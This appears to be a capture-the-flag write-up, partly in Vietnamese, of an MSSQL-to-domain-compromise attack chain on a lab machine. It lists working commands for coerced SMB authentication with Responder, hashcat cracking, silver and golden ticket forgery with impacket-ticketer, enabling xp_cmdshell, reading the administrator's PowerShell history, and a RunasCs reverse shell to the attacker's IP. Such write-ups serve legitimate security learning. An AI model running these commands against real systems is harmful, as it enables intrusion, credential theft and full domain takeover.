mssql

Attack chain:

MSSQL Guest Access (scott:<hehe>)
    ↓
xp_dirtree Forced SMB Auth → Responder captures NTLMv2 hash
    ↓
Hash Cracking → mssqlsvc:<password>
    ↓
Windows Auth to MSSQL → Sysadmin privileges + IT group membership
    ↓
Silver Ticket Creation (mssqlsvc NTLM + Domain SID + IT RID)
    ↓
Administrator impersonation on MSSQL → xp_cmdshell enabled
    ↓
Golden Ticket with Domain/Enterprise Admin RIDs
    ↓
OPENROWSET to read Administrator PowerShell history
    ↓
Administrator credentials → Full domain compromise

Dùng impacket-mssqlclient kết nối:

impacket-mssqlclient <user>:<passwd>@<ip>

Responder lấy hash session của mssqlsvc:

sudo responder -I tun0

Dùng xp_dirtree để trigger SMB share:

EXEC xp_dirtree '\\<ip tun>\share';

Crack hash password:

hashcat -m 5600 pass.hash /usr/share/wordlists/rockyou.txt

Thu được password của mssqlsvc:

impacket-mssqlclient -windows-auth domain/mssqlsvc:'<cracked password>'@<ip>

Check server role memberships:

EXEC sp_helpsrvrolemember 'sysadmin';

Check linked server xem có mapping với DC không:

EXEC sp_linkedservers;

Convert password của mssqlsvc sang ntlm hash:

python3 -c 'import hashlib; print(hashlib.new("md4", "<cracked password>".encode("utf-16le")).hexdigest())'

Get user SID để forged ticket

SELECT SUSER_SID();

Get group SID:

EXEC sp_helpsrvrolemember 'sysadmin';

SID gồm các thành phần:

S-<revision>-<identifier_authority>-<subauthority1>-...-<subauthorityN>

Tạo silver ticket:

impacket-ticketer \
  -nthash ef699384c3285c54128a3ee1ddb1a0cc \
  -domain <domain> \
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
  -user-id 500 \
  -groups 512,1105 \
  -spn MSSQLSvc/DC01.domain:1433 \
  Administrator

512: Domain Admins
1105: Group SID
500: Administrator (target user)

export KRB5CCNAME=Administrator.ccache

impacket-mssqlclient -k DC01.<domain>

Khi có được sysadmin-level, bật xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Forge golden ticket cho Administrator, get SID của group Domain Admins và Enterprise Admins:

SELECT SUSER_SID('SIGNED\Domain Admins');

SELECT SUSER_SID('SIGNED\Enterprise Admins');

Ví dụ thu được:

Domain ADmins SID: S-1-5-21-4088429403-1159899800-2753317549-512
Enterprise Admins SID: S-1-5-21-4088429403-1159899800-2753317549-519
Group SID: 1105
User ID : 1103 (for mssqlsvc)

impacket-ticketer \
	-nthash <nthash of mssqlsvc> \
	-domain <domain> \
	-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
	-user-id 1103 \
	-groups 512,519,1105 \
	-spn MSSQLSvc/DC01.SIGNED.HTB:1433 \
	mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache

impacket-mssqlclient -k DC01.<domain>

Bật advanced configuration options:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

Check history powershell command:

SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',SINGLE_CLOB) AS x;

Thu được admin password dạng cleartext, reverse shell

C:\Windows\Temp\RunasCs.exe Administrator <password> powershell.exe -r <ip tun>:<port>

PreviousGroups

Last updated 15 days ago